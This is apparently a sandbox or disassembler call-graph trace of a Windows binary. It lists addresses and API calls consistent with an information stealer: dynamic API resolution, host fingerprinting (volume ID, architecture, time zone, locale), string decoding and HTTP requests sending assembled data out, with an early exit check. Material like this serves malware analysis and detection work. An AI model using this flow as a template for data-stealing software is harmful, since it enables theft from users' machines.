14235->14236 14237 c33aa0 14236->14237 14238 c345c0 2 API calls 14237->14238 14239 c33ab9 14238->14239 14240 c345c0 2 API calls 14239->14240 14241 c33ad2 14240->14241 14242 c345c0 2 API calls 14241->14242 14243 c33aeb 14242->14243 14244 c345c0 2 API calls 14243->14244 14245 c33b04 14244->14245 14246 c345c0 2 API calls 14245->14246 14247 c33b1d 14246->14247 14248 c345c0 2 API calls 14247->14248 14249 c33b36 14248->14249 14250 c345c0 2 API calls 14249->14250 14251 c33b4f 14250->14251 14252 c345c0 2 API calls 14251->14252 14253 c33b68 14252->14253 14254 c345c0 2 API calls 14253->14254 14255 c33b81 14254->14255 14256 c345c0 2 API calls 14255->14256 14257 c33b9a 14256->14257 14258 c345c0 2 API calls 14257->14258 14259 c33bb3 14258->14259 14260 c345c0 2 API calls 14259->14260 14261 c33bcc 14260->14261 14262 c345c0 2 API calls 14261->14262 14263 c33be5 14262->14263 14264 c345c0 2 API calls 14263->14264 14265 c33bfe 14264->14265 14266 c345c0 2 API calls 14265->14266 14267 c33c17 14266->14267 14268 c345c0 2 API calls 14267->14268 14269 c33c30 14268->14269 14270 c345c0 2 API calls 14269->14270 14271 c33c49 14270->14271 14272 c345c0 2 API calls 14271->14272 14273 c33c62 14272->14273 14274 c345c0 2 API calls 14273->14274 14275 c33c7b 14274->14275 14276 c345c0 2 API calls 14275->14276 14277 c33c94 14276->14277 14278 c345c0 2 API calls 14277->14278 14279 c33cad 14278->14279 14280 c345c0 2 API calls 14279->14280 14281 c33cc6 14280->14281 14282 c345c0 2 API calls 14281->14282 14283 c33cdf 14282->14283 14284 c345c0 2 API calls 14283->14284 14285 c33cf8 14284->14285 14286 c345c0 2 API calls 14285->14286 14287 c33d11 14286->14287 14288 c345c0 2 API calls 14287->14288 14289 c33d2a 14288->14289 14290 c345c0 2 API calls 14289->14290 14291 c33d43 14290->14291 14292 c345c0 2 API calls 14291->14292 14293 c33d5c 14292->14293 14294 c345c0 2 API calls 14293->14294 14295 c33d75 14294->14295 14296 c345c0 2 API calls 14295->14296 14297 c33d8e 14296->14297 14298 c345c0 2 API calls 14297->14298 14299 c33da7 14298->14299 14300 c345c0 2 API calls 14299->14300 14301 c33dc0 14300->14301 14302 c345c0 2 API calls 14301->14302 14303 c33dd9 14302->14303 14304 c345c0 2 API calls 14303->14304 14305 c33df2 14304->14305 14306 c345c0 2 API calls 14305->14306 14307 c33e0b 14306->14307 14308 c345c0 2 API calls 14307->14308 14309 c33e24 14308->14309 14310 c345c0 2 API calls 14309->14310 14311 c33e3d 14310->14311 14312 c345c0 2 API calls 14311->14312 14313 c33e56 14312->14313 14314 c345c0 2 API calls 14313->14314 14315 c33e6f 14314->14315 14316 c345c0 2 API calls 14315->14316 14317 c33e88 14316->14317 14318 c345c0 2 API calls 14317->14318 14319 c33ea1 14318->14319 14320 c345c0 2 API calls 14319->14320 14321 c33eba 14320->14321 14322 c345c0 2 API calls 14321->14322 14323 c33ed3 14322->14323 14324 c345c0 2 API calls 14323->14324 14325 c33eec 14324->14325 14326 c345c0 2 API calls 14325->14326 14327 c33f05 14326->14327 14328 c345c0 2 API calls 14327->14328 14329 c33f1e 14328->14329 14330 c345c0 2 API calls 14329->14330 14331 c33f37 14330->14331 14332 c345c0 2 API calls 14331->14332 14333 c33f50 14332->14333 14334 c345c0 2 API calls 14333->14334 14335 c33f69 14334->14335 14336 c345c0 2 API calls 14335->14336 14337 c33f82 14336->14337 14338 c345c0 2 API calls 14337->14338 14339 c33f9b 14338->14339 14340 c345c0 2 API calls 14339->14340 14341 c33fb4 14340->14341 14342 c345c0 2 API calls 14341->14342 14343 c33fcd 14342->14343 14344 c345c0 2 API calls 14343->14344 14345 c33fe6 14344->14345 14346 c345c0 2 API calls 14345->14346 14347 c33fff 14346->14347 14348 c345c0 2 API calls 14347->14348 14349 c34018 14348->14349 14350 c345c0 2 API calls 14349->14350 14351 c34031 14350->14351 14352 c345c0 2 API calls 14351->14352 14353 c3404a 14352->14353 14354 c345c0 2 API calls 14353->14354 14355 c34063 14354->14355 14356 c345c0 2 API calls 14355->14356 14357 c3407c 14356->14357 14358 c345c0 2 API calls 14357->14358 14359 c34095 14358->14359 14360 c345c0 2 API calls 14359->14360 14361 c340ae 14360->14361 14362 c345c0 2 API calls 14361->14362 14363 c340c7 14362->14363 14364 c345c0 2 API calls 14363->14364 14365 c340e0 14364->14365 14366 c345c0 2 API calls 14365->14366 14367 c340f9 14366->14367 14368 c345c0 2 API calls 14367->14368 14369 c34112 14368->14369 14370 c345c0 2 API calls 14369->14370 14371 c3412b 14370->14371 14372 c345c0 2 API calls 14371->14372 14373 c34144 14372->14373 14374 c345c0 2 API calls 14373->14374 14375 c3415d 14374->14375 14376 c345c0 2 API calls 14375->14376 14377 c34176 14376->14377 14378 c345c0 2 API calls 14377->14378 14379 c3418f 14378->14379 14380 c345c0 2 API calls 14379->14380 14381 c341a8 14380->14381 14382 c345c0 2 API calls 14381->14382 14383 c341c1 14382->14383 14384 c345c0 2 API calls 14383->14384 14385 c341da 14384->14385 14386 c345c0 2 API calls 14385->14386 14387 c341f3 14386->14387 14388 c345c0 2 API calls 14387->14388 14389 c3420c 14388->14389 14390 c345c0 2 API calls 14389->14390 14391 c34225 14390->14391 14392 c345c0 2 API calls 14391->14392 14393 c3423e 14392->14393 14394 c345c0 2 API calls 14393->14394 14395 c34257 14394->14395 14396 c345c0 2 API calls 14395->14396 14397 c34270 14396->14397 14398 c345c0 2 API calls 14397->14398 14399 c34289 14398->14399 14400 c345c0 2 API calls 14399->14400 14401 c342a2 14400->14401 14402 c345c0 2 API calls 14401->14402 14403 c342bb 14402->14403 14404 c345c0 2 API calls 14403->14404 14405 c342d4 14404->14405 14406 c345c0 2 API calls 14405->14406 14407 c342ed 14406->14407 14408 c345c0 2 API calls 14407->14408 14409 c34306 14408->14409 14410 c345c0 2 API calls 14409->14410 14411 c3431f 14410->14411 14412 c345c0 2 API calls 14411->14412 14413 c34338 14412->14413 14414 c345c0 2 API calls 14413->14414 14415 c34351 14414->14415 14416 c345c0 2 API calls 14415->14416 14417 c3436a 14416->14417 14418 c345c0 2 API calls 14417->14418 14419 c34383 14418->14419 14420 c345c0 2 API calls 14419->14420 14421 c3439c 14420->14421 14422 c345c0 2 API calls 14421->14422 14423 c343b5 14422->14423 14424 c345c0 2 API calls 14423->14424 14425 c343ce 14424->14425 14426 c345c0 2 API calls 14425->14426 14427 c343e7 14426->14427 14428 c345c0 2 API calls 14427->14428 14429 c34400 14428->14429 14430 c345c0 2 API calls 14429->14430 14431 c34419 14430->14431 14432 c345c0 2 API calls 14431->14432 14433 c34432 14432->14433 14434 c345c0 2 API calls 14433->14434 14435 c3444b 14434->14435 14436 c345c0 2 API calls 14435->14436 14437 c34464 14436->14437 14438 c345c0 2 API calls 14437->14438 14439 c3447d 14438->14439 14440 c345c0 2 API calls 14439->14440 14441 c34496 14440->14441 14442 c345c0 2 API calls 14441->14442 14443 c344af 14442->14443 14444 c345c0 2 API calls 14443->14444 14445 c344c8 14444->14445 14446 c345c0 2 API calls 14445->14446 14447 c344e1 14446->14447 14448 c345c0 2 API calls 14447->14448 14449 c344fa 14448->14449 14450 c345c0 2 API calls 14449->14450 14451 c34513 14450->14451 14452 c345c0 2 API calls 14451->14452 14453 c3452c 14452->14453 14454 c345c0 2 API calls 14453->14454 14455 c34545 14454->14455 14456 c345c0 2 API calls 14455->14456 14457 c3455e 14456->14457 14458 c345c0 2 API calls 14457->14458 14459 c34577 14458->14459 14460 c345c0 2 API calls 14459->14460 14461 c34590 14460->14461 14462 c345c0 2 API calls 14461->14462 14463 c345a9 14462->14463 14464 c49c10 14463->14464 14465 c4a036 8 API calls 14464->14465 14466 c49c20 43 API calls 14464->14466 14467 c4a146 14465->14467 14468 c4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14465->14468 14466->14465 14469 c4a216 14467->14469 14470 c4a153 8 API calls 14467->14470 14468->14467 14471 c4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14469->14471 14472 c4a298 14469->14472 14470->14469 14471->14472 14473 c4a2a5 6 API calls 14472->14473 14474 c4a337 14472->14474 14473->14474 14475 c4a344 9 API calls 14474->14475 14476 c4a41f 14474->14476 14475->14476 14477 c4a4a2 14476->14477 14478 c4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14476->14478 14479 c4a4dc 14477->14479 14480 c4a4ab GetProcAddress GetProcAddress 14477->14480 14478->14477 14481 c4a515 14479->14481 14482 c4a4e5 GetProcAddress GetProcAddress 14479->14482 14480->14479 14483 c4a612 14481->14483 14484 c4a522 10 API calls 14481->14484 14482->14481 14485 c4a67d 14483->14485 14486 c4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14483->14486 14484->14483 14487 c4a686 GetProcAddress 14485->14487 14488 c4a69e 14485->14488 14486->14485 14487->14488 14489 c4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14488->14489 14490 c45ca3 14488->14490 14489->14490 14491 c31590 14490->14491 15611 c31670 14491->15611 14494 c4a7a0 lstrcpy 14495 c315b5 14494->14495 14496 c4a7a0 lstrcpy 14495->14496 14497 c315c7 14496->14497 14498 c4a7a0 lstrcpy 14497->14498 14499 c315d9 14498->14499 14500 c4a7a0 lstrcpy 14499->14500 14501 c31663 14500->14501 14502 c45510 14501->14502 14503 c45521 14502->14503 14504 c4a820 2 API calls 14503->14504 14505 c4552e 14504->14505 14506 c4a820 2 API calls 14505->14506 14507 c4553b 14506->14507 14508 c4a820 2 API calls 14507->14508 14509 c45548 14508->14509 14510 c4a740 lstrcpy 14509->14510 14511 c45555 14510->14511 14512 c4a740 lstrcpy 14511->14512 14513 c45562 14512->14513 14514 c4a740 lstrcpy 14513->14514 14515 c4556f 14514->14515 14516 c4a740 lstrcpy 14515->14516 14519 c4557c 14516->14519 14517 c4a7a0 lstrcpy 14517->14519 14518 c45643 StrCmpCA 14518->14519 14519->14517 14519->14518 14520 c456a0 StrCmpCA 14519->14520 14524 c4a820 lstrlen lstrcpy 14519->14524 14526 c45856 StrCmpCA 14519->14526 14529 c4a740 lstrcpy 14519->14529 14534 c31590 lstrcpy 14519->14534 14537 c45a0b StrCmpCA 14519->14537 14538 c452c0 25 API calls 14519->14538 14539 c451f0 20 API calls 14519->14539 14546 c4a8a0 lstrcpy 14519->14546 14553 c4578a StrCmpCA 14519->14553 14555 c4593f StrCmpCA 14519->14555 14520->14519 14521 c457dc 14520->14521 14522 c4a8a0 lstrcpy 14521->14522 14523 c457e8 14522->14523 14525 c4a820 2 API calls 14523->14525 14524->14519 14527 c457f6 14525->14527 14526->14519 14528 c45991 14526->14528 14530 c4a820 2 API calls 14527->14530 14531 c4a8a0 lstrcpy 14528->14531 14529->14519 14532 c45805 14530->14532 14535 c4599d 14531->14535 14533 c31670 lstrcpy 14532->14533 14556 c45811 14533->14556 14534->14519 14536 c4a820 2 API calls 14535->14536 14540 c459ab 14536->14540 14541 c45a16 Sleep 14537->14541 14542 c45a28 14537->14542 14538->14519 14539->14519 14543 c4a820 2 API calls 14540->14543 14541->14519 14545 c4a8a0 lstrcpy 14542->14545 14544 c459ba 14543->14544 14547 c31670 lstrcpy 14544->14547 14548 c45a34 14545->14548 14546->14519 14547->14556 14549 c4a820 2 API calls 14548->14549 14550 c45a43 14549->14550 14551 c4a820 2 API calls 14550->14551 14552 c45a52 14551->14552 14554 c31670 lstrcpy 14552->14554 14553->14519 14554->14556 14555->14519 14556->13609 14558 c47553 GetVolumeInformationA 14557->14558 14559 c4754c 14557->14559 14560 c47591 14558->14560 14559->14558 14561 c475fc GetProcessHeap RtlAllocateHeap 14560->14561 14562 c47628 wsprintfA 14561->14562 14563 c47619 14561->14563 14565 c4a740 lstrcpy 14562->14565 14564 c4a740 lstrcpy 14563->14564 14566 c45da7 14564->14566 14565->14566 14566->13630 14568 c4a7a0 lstrcpy 14567->14568 14569 c34899 14568->14569 15620 c347b0 14569->15620 14571 c348a5 14572 c4a740 lstrcpy 14571->14572 14573 c348d7 14572->14573 14574 c4a740 lstrcpy 14573->14574 14575 c348e4 14574->14575 14576 c4a740 lstrcpy 14575->14576 14577 c348f1 14576->14577 14578 c4a740 lstrcpy 14577->14578 14579 c348fe 14578->14579 14580 c4a740 lstrcpy 14579->14580 14581 c3490b InternetOpenA StrCmpCA 14580->14581 14582 c34944 14581->14582 14583 c34955 14582->14583 14584 c34ecb InternetCloseHandle 14582->14584 15631 c48b60 14583->15631 14586 c34ee8 14584->14586 15626 c39ac0 CryptStringToBinaryA 14586->15626 14587 c34963 15639 c4a920 14587->15639 14590 c34976 14592 c4a8a0 lstrcpy 14590->14592 14598 c3497f 14592->14598 14593 c4a820 2 API calls 14594 c34f05 14593->14594 14595 c4a9b0 4 API calls 14594->14595 14597 c34f1b 14595->14597 14596 c34f27 codecvt 14600 c4a7a0 lstrcpy 14596->14600 14599 c4a8a0 lstrcpy 14597->14599 14601 c4a9b0 4 API calls 14598->14601 14599->14596 14612 c34f57 14600->14612 14602 c349a9 14601->14602 14603 c4a8a0 lstrcpy 14602->14603 14604 c349b2 14603->14604 14605 c4a9b0 4 API calls 14604->14605 14606 c349d1 14605->14606 14607 c4a8a0 lstrcpy 14606->14607 14608 c349da 14607->14608 14609 c4a920 3 API calls 14608->14609 14610 c349f8 14609->14610 14611 c4a8a0 lstrcpy 14610->14611 14613 c34a01 14611->14613 14612->13633 14614 c4a9b0 4 API calls 14613->14614 14615 c34a20 14614->14615 14616 c4a8a0 lstrcpy 14615->14616 14617 c34a29 14616->14617 14618 c4a9b0 4 API calls 14617->14618 14619 c34a48 14618->14619 14620 c4a8a0 lstrcpy 14619->14620 14621 c34a51 14620->14621 14622 c4a9b0 4 API calls 14621->14622 14623 c34a7d 14622->14623 14624 c4a920 3 API calls 14623->14624 14625 c34a84 14624->14625 14626 c4a8a0 lstrcpy 14625->14626 14627 c34a8d 14626->14627 14628 c34aa3 InternetConnectA 14627->14628 14628->14584 14629 c34ad3 HttpOpenRequestA 14628->14629 14631 c34b28 14629->14631 14632 c34ebe InternetCloseHandle 14629->14632 14633 c4a9b0 4 API calls 14631->14633 14632->14584 14634 c34b3c 14633->14634 14635 c4a8a0 lstrcpy 14634->14635 14636 c34b45 14635->14636 14637 c4a920 3 API calls 14636->14637 14638 c34b63 14637->14638 14639 c4a8a0 lstrcpy 14638->14639 14640 c34b6c 14639->14640 14641 c4a9b0 4 API calls 14640->14641 14642 c34b8b 14641->14642 14643 c4a8a0 lstrcpy 14642->14643 14644 c34b94 14643->14644 14645 c4a9b0 4 API calls 14644->14645 14646 c34bb5 14645->14646 14647 c4a8a0 lstrcpy 14646->14647 14648 c34bbe 14647->14648 14649 c4a9b0 4 API calls 14648->14649 14650 c34bde 14649->14650 14651 c4a8a0 lstrcpy 14650->14651 14652 c34be7 14651->14652 14653 c4a9b0 4 API calls 14652->14653 14654 c34c06 14653->14654 14655 c4a8a0 lstrcpy 14654->14655 14656 c34c0f 14655->14656 14657 c4a920 3 API calls 14656->14657 14658 c34c2d 14657->14658 14659 c4a8a0 lstrcpy 14658->14659 14660 c34c36 14659->14660 14661 c4a9b0 4 API calls 14660->14661 14662 c34c55 14661->14662 14663 c4a8a0 lstrcpy 14662->14663 14664 c34c5e 14663->14664 14665 c4a9b0 4 API calls 14664->14665 14666 c34c7d 14665->14666 14667 c4a8a0 lstrcpy 14666->14667 14668 c34c86 14667->14668 14669 c4a920 3 API calls 14668->14669 14670 c34ca4 14669->14670 14671 c4a8a0 lstrcpy 14670->14671 14672 c34cad 14671->14672 14673 c4a9b0 4 API calls 14672->14673 14674 c34ccc 14673->14674 14675 c4a8a0 lstrcpy 14674->14675 14676 c34cd5 14675->14676 14677 c4a9b0 4 API calls 14676->14677 14678 c34cf6 14677->14678 14679 c4a8a0 lstrcpy 14678->14679 14680 c34cff 14679->14680 14681 c4a9b0 4 API calls 14680->14681 14682 c34d1f 14681->14682 14683 c4a8a0 lstrcpy 14682->14683 14684 c34d28 14683->14684 14685 c4a9b0 4 API calls 14684->14685 14686 c34d47 14685->14686 14687 c4a8a0 lstrcpy 14686->14687 14688 c34d50 14687->14688 14689 c4a920 3 API calls 14688->14689 14690 c34d6e 14689->14690 14691 c4a8a0 lstrcpy 14690->14691 14692 c34d77 14691->14692 14693 c4a740 lstrcpy 14692->14693 14694 c34d92 14693->14694 14695 c4a920 3 API calls 14694->14695 14696 c34db3 14695->14696 14697 c4a920 3 API calls 14696->14697 14698 c34dba 14697->14698 14699 c4a8a0 lstrcpy 14698->14699 14700 c34dc6 14699->14700 14701 c34de7 lstrlen 14700->14701 14702 c34dfa 14701->14702 14703 c34e03 lstrlen 14702->14703 15645 c4aad0 14703->15645 14705 c34e13 HttpSendRequestA 14706 c34e32 InternetReadFile 14705->14706 14707 c34e67 InternetCloseHandle 14706->14707 14712 c34e5e 14706->14712 14709 c4a800 14707->14709 14709->14632 14710 c4a9b0 4 API calls 14710->14712 14711 c4a8a0 lstrcpy 14711->14712 14712->14706 14712->14707 14712->14710 14712->14711 15647 c4aad0 14713->15647 14715 c417c4 StrCmpCA 14716 c417cf ExitProcess 14715->14716 14717 c417d7 14715->14717 14718 c419c2 14717->14718 14719 c418ad StrCmpCA 14717->14719 14720 c418cf StrCmpCA 14717->14720 14721 c41970 StrCmpCA 14717->14721 14722 c418f1 StrCmpCA 14717->14722 14723 c41951 StrCmpCA 14717->14723 14724 c41932 StrCmpCA 14717->14724 14725 c41913 StrCmpCA 14717->14725 14726 c4185d StrCmpCA 14717->14726 14727 c4187f StrCmpCA 14717->14727 14728 c4a820 lstrlen lstrcpy 14717->14728 14718->13635 14719->14717 14720->14717 14721->14717 14722->14717 14723->14717 14724->14717 14725->14717 14726->14717 14727->14717 14728->14717 14730 c4a7a0 lstrcpy 14729->14730 14731 c35979 14730->14731 14732 c347b0 2 API calls 14731->14732 14733 c35985 14732->14733 14734 c4a740 lstrcpy 14733->14734 14735 c359ba 14734->14735 14736 c4a740 lstrcpy 14735->14736 14737 c359c7 14736->14737 14738 c4a740 lstrcpy 14737->14738 14739 c359d4 14738->14739 14740 c4a740 lstrcpy 14739->14740 14741 c359e1 14740->14741 14742 c4a740 lstrcpy 14741->14742 14743 c359ee InternetOpenA StrCmpCA 14742->14743 14744 c35a1d 14743->14744 14745 c35fc3 InternetCloseHandle 14744->14745 14746 c48b60 3 API calls 14744->14746 14747 c35fe0 14745->14747 14748 c35a3c 14746->14748 14750 c39ac0 4 API calls 14747->14750 14749 c4a920 3 API calls 14748->14749 14751 c35a4f 14749->14751 14752 c35fe6 14750->14752 14753 c4a8a0 lstrcpy 14751->14753 14754 c4a820 2 API calls 14752->14754 14757 c3601f codecvt 14752->14757 14759 c35a58 14753->14759 14755 c35ffd 14754->14755 14756 c4a9b0 4 API calls 14755->14756 14758 c36013 14756->14758 14761 c4a7a0 lstrcpy 14757->14761 14760 c4a8a0 lstrcpy 14758->14760 14762 c4a9b0 4 API calls 14759->14762 14760->14757 14770 c3604f 14761->14770 14763 c35a82 14762->14763 14764 c4a8a0 lstrcpy 14763->14764 14765 c35a8b 14764->14765 14766 c4a9b0 4 API calls 14765->14766 14767 c35aaa 14766->14767 14768 c4a8a0 lstrcpy 14767->14768 14769 c35ab3 14768->14769 14771 c4a920 3 API calls 14769->14771 14770->13641 14772 c35ad1 14771->14772 14773 c4a8a0 lstrcpy 14772->14773 14774 c35ada 14773->14774 14775 c4a9b0 4 API calls 14774->14775 14776 c35af9 14775->14776 14777 c4a8a0 lstrcpy 14776->14777 14778 c35b02 14777->14778 14779 c4a9b0 4 API calls 14778->14779 14780 c35b21 14779->14780 14781 c4a8a0 lstrcpy 14780->14781 14782 c35b2a 14781->14782 14783 c4a9b0 4 API calls 14782->14783 14784 c35b56 14783->14784 14785 c4a920 3 API calls 14784->14785 14786 c35b5d 14785->14786 14787 c4a8a0 lstrcpy 14786->14787 14788 c35b66 14787->14788 14789 c35b7c InternetConnectA 14788->14789 14789->14745 14790 c35bac HttpOpenRequestA 14789->14790 14792 c35fb6 InternetCloseHandle 14790->14792 14793 c35c0b 14790->14793 14792->14745 14794 c4a9b0 4 API calls 14793->14794 14795 c35c1f 14794->14795 14796 c4a8a0 lstrcpy 14795->14796 14797 c35c28 14796->14797 14798 c4a920 3 API calls 14797->14798 14799 c35c46 14798->14799 14800 c4a8a0 lstrcpy 14799->14800 14801 c35c4f 14800->14801 14802 c4a9b0 4 API calls 14801->14802 14803 c35c6e 14802->14803 14804 c4a8a0 lstrcpy 14803->14804 14805 c35c77 14804->14805 14806 c4a9b0 4 API calls 14805->14806 14807 c35c98 14806->14807 14808 c4a8a0 lstrcpy 14807->14808 14809 c35ca1 14808->14809 14810 c4a9b0 4 API calls 14809->14810 14811 c35cc1 14810->14811 14812 c4a8a0 lstrcpy 14811->14812 14813 c35cca 14812->14813 14814 c4a9b0 4 API calls 14813->14814 14815 c35ce9 14814->14815 14816 c4a8a0 lstrcpy 14815->14816 14817 c35cf2 14816->14817 14818 c4a920 3 API calls 14817->14818 14819 c35d10 14818->14819 14820 c4a8a0 lstrcpy 14819->14820 14821 c35d19 14820->14821 14822 c4a9b0 4 API calls 14821->14822 14823 c35d38 14822->14823 14824 c4a8a0 lstrcpy 14823->14824 14825 c35d41 14824->14825 14826 c4a9b0 4 API calls 14825->14826 14827 c35d60 14826->14827 14828 c4a8a0 lstrcpy 14827->14828 14829 c35d69 14828->14829 14830 c4a920 3 API calls 14829->14830 14831 c35d87 14830->14831 14832 c4a8a0 lstrcpy 14831->14832 14833 c35d90 14832->14833 14834 c4a9b0 4 API calls 14833->14834 14835 c35daf 14834->14835 14836 c4a8a0 lstrcpy 14835->14836 14837 c35db8 14836->14837 14838 c4a9b0 4 API calls 14837->14838 14839 c35dd9 14838->14839 14840 c4a8a0 lstrcpy 14839->14840 14841 c35de2 14840->14841 14842 c4a9b0 4 API calls 14841->14842 14843 c35e02 14842->14843 14844 c4a8a0 lstrcpy 14843->14844 14845 c35e0b 14844->14845 14846 c4a9b0 4 API calls 14845->14846 14847 c35e2a 14846->14847 14848 c4a8a0 lstrcpy 14847->14848 14849 c35e33 14848->14849 14850 c4a920 3 API calls 14849->14850 14851 c35e54 14850->14851 14852 c4a8a0 lstrcpy 14851->14852 14853 c35e5d 14852->14853 14854 c35e70 lstrlen 14853->14854 15648 c4aad0 14854->15648 14856 c35e81 lstrlen GetProcessHeap RtlAllocateHeap 15649 c4aad0 14856->15649 14858 c35eae lstrlen 14859 c35ebe 14858->14859 14860 c35ed7 lstrlen 14859->14860 14861 c35ee7 14860->14861 14862 c35ef0 lstrlen 14861->14862 14863 c35f04 14862->14863 14864 c35f1a lstrlen 14863->14864 15650 c4aad0 14864->15650 14866 c35f2a HttpSendRequestA 14867 c35f35 InternetReadFile 14866->14867 14868 c35f6a InternetCloseHandle 14867->14868 14872 c35f61 14867->14872 14868->14792 14870 c4a9b0 4 API calls 14870->14872 14871 c4a8a0 lstrcpy 14871->14872 14872->14867 14872->14868 14872->14870 14872->14871 14875 c41077 14873->14875 14874 c41151 14874->13643 14875->14874 14876 c4a820 lstrlen lstrcpy 14875->14876 14876->14875 14878 c40db7 14877->14878 14879 c40f17 14878->14879 14880 c40ea4 StrCmpCA 14878->14880 14881 c40e27 StrCmpCA 14878->14881 14882 c40e67 StrCmpCA 14878->14882 14883 c4a820 lstrlen lstrcpy 14878->14883 14879->13651 14880->14878 14881->14878 14882->14878 14883->14878 14888 c40f67 14884->14888 14885 c41044 14885->13659 14886 c4a820 lstrlen lstrcpy 14886->14888 14887 c40fb2 StrCmpCA 14887->14888 14888->14885 14888->14886 14888->14887 14890 c4a740 lstrcpy 14889->14890 14891 c41a26 14890->14891 14892 c4a9b0 4 API calls 14891->14892 14893 c41a37 14892->14893 14894 c4a8a0 lstrcpy 14893->14894 14895 c41a40 14894->14895 14896 c4a9b0 4 API calls 14895->14896 14897 c41a5b 14896->14897 14898 c4a8a0 lstrcpy 14897->14898 14899 c41a64 14898->14899 14900 c4a9b0 4 API calls 14899->14900 14901 c41a7d 14900->14901 14902 c4a8a0 lstrcpy 14901->14902 14903 c41a86 14902->14903 14904 c4a9b0 4 API calls 14903->14904 14905 c41aa1 14904->14905 14906 c4a8a0 lstrcpy 14905->14906 14907 c41aaa 14906->14907 14908 c4a9b0 4 API calls 14907->14908 14909 c41ac3 14908->14909 14910 c4a8a0 lstrcpy 14909->14910 14911 c41acc 14910->14911 14912 c4a9b0 4 API calls 14911->14912 14913 c41ae7 14912->14913 14914 c4a8a0 lstrcpy 14913->14914 14915 c41af0 14914->14915 14916 c4a9b0 4 API calls 14915->14916 14917 c41b09 14916->14917 14918 c4a8a0 lstrcpy 14917->14918 14919 c41b12 14918->14919 14920 c4a9b0 4 API calls 14919->14920 14921 c41b2d 14920->14921 14922 c4a8a0 lstrcpy 14921->14922 14923 c41b36 14922->14923 14924 c4a9b0 4 API calls 14923->14924 14925 c41b4f 14924->14925 14926 c4a8a0 lstrcpy 14925->14926 14927 c41b58 14926->14927 14928 c4a9b0 4 API calls 14927->14928 14929 c41b76 14928->14929 14930 c4a8a0 lstrcpy 14929->14930 14931 c41b7f 14930->14931 14932 c47500 6 API calls 14931->14932 14933 c41b96 14932->14933 14934 c4a920 3 API calls 14933->14934 14935 c41ba9 14934->14935 14936 c4a8a0 lstrcpy 14935->14936 14937 c41bb2 14936->14937 14938 c4a9b0 4 API calls 14937->14938 14939 c41bdc 14938->14939 14940 c4a8a0 lstrcpy 14939->14940 14941 c41be5 14940->14941 14942 c4a9b0 4 API calls 14941->14942 14943 c41c05 14942->14943 14944 c4a8a0 lstrcpy 14943->14944 14945 c41c0e 14944->14945 15651 c47690 GetProcessHeap RtlAllocateHeap 14945->15651 14948 c4a9b0 4 API calls 14949 c41c2e 14948->14949 14950 c4a8a0 lstrcpy 14949->14950 14951 c41c37 14950->14951 14952 c4a9b0 4 API calls 14951->14952 14953 c41c56 14952->14953 14954 c4a8a0 lstrcpy 14953->14954 14955 c41c5f 14954->14955 14956 c4a9b0 4 API calls 14955->14956 14957 c41c80 14956->14957 14958 c4a8a0 lstrcpy 14957->14958 14959 c41c89 14958->14959 15658 c477c0 GetCurrentProcess IsWow64Process 14959->15658 14962 c4a9b0 4 API calls 14963 c41ca9 14962->14963 14964 c4a8a0 lstrcpy 14963->14964 14965 c41cb2 14964->14965 14966 c4a9b0 4 API calls 14965->14966 14967 c41cd1 14966->14967 14968 c4a8a0 lstrcpy 14967->14968 14969 c41cda 14968->14969 14970 c4a9b0 4 API calls 14969->14970 14971 c41cfb 14970->14971 14972 c4a8a0 lstrcpy 14971->14972 14973 c41d04 14972->14973 14974 c47850 3 API calls 14973->14974 14975 c41d14 14974->14975 14976 c4a9b0 4 API calls 14975->14976 14977 c41d24 14976->14977 14978 c4a8a0 lstrcpy 14977->14978 14979 c41d2d 14978->14979 14980 c4a9b0 4 API calls 14979->14980 14981 c41d4c 14980->14981 14982 c4a8a0 lstrcpy 14981->14982 14983 c41d55 14982->14983 14984 c4a9b0 4 API calls 14983->14984 14985 c41d75 14984->14985 14986 c4a8a0 lstrcpy 14985->14986 14987 c41d7e 14986->14987 14988 c478e0 3 API calls 14987->14988 14989 c41d8e 14988->14989 14990 c4a9b0 4 API calls 14989->14990 14991 c41d9e 14990->14991 14992 c4a8a0 lstrcpy 14991->14992 14993 c41da7 14992->14993 14994 c4a9b0 4 API calls 14993->14994 14995 c41dc6 14994->14995 14996 c4a8a0 lstrcpy 14995->14996 14997 c41dcf 14996->14997 14998 c4a9b0 4 API calls 14997->14998 14999 c41df0 14998->14999 15000 c4a8a0 lstrcpy 14999->15000 15001 c41df9 15000->15001 15660 c47980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15001->15660 15004 c4a9b0 4 API calls 15005 c41e19 15004->15005 15006 c4a8a0 lstrcpy 15005->15006 15007 c41e22 15006->15007 15008 c4a9b0 4 API calls 15007->15008 15009 c41e41 15008->15009 15010 c4a8a0 lstrcpy 15009->15010 15011 c41e4a 15010->15011 15012 c4a9b0 4 API calls 15011->15012 15013 c41e6b 15012->15013 15014 c4a8a0 lstrcpy 15013->15014 15015 c41e74 15014->15015 15662 c47a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15015->15662 15018 c4a9b0 4 API calls 15019 c41e94 15018->15019 15020 c4a8a0 lstrcpy 15019->15020 15021 c41e9d 15020->15021 15022 c4a9b0 4 API calls 15021->15022 15023 c41ebc 15022->15023 15024 c4a8a0 lstrcpy 15023->15024 15025 c41ec5 15024->15025 15026 c4a9b0 4 API calls 15025->15026 15027 c41ee5 15026->15027 15028 c4a8a0 lstrcpy 15027->15028 15029 c41eee 15028->15029 15665 c47b00 GetUserDefaultLocaleName 15029->15665 15032 c4a9b0 4 API calls 15033 c41f0e 15032->15033 15034 c4a8a0 lstrcpy 15033->15034 15035 c41f17 15034->15035 15036 c4a9b0 4 API calls 15035->15036 15037 c41f36 15036->15037 15038 c4a8a0 lstrcpy 15037->15038 15039 c41f3f 15038->15039 15040 c4a9b0 4 API calls 15039->15040 15041 c41f60 15040->15041 15042 c4a8a0 lstrcpy 15041->15042 15043 c41f69 15042->15043 15669 c47b90 15043->15669 15045 c41f80 15046 c4a920 3 API calls 15045->15046 15047 c41f93 15046->15047 15048 c4a8a0 lstrcpy 15047->15048 15049 c41f9c 15048->15049 15050 c4a9b0 4 API calls 15049->15050 15051 c41fc6 15050->15051 15052 c4a8a0 lstrcpy 15051->15052 15053 c41fcf 15052->15053 15054 c4a9b0 4 API calls 15053->15054 15055 c41fef 15054->15055 15056 c4a8a0 lstrcpy 15055->15056 15057 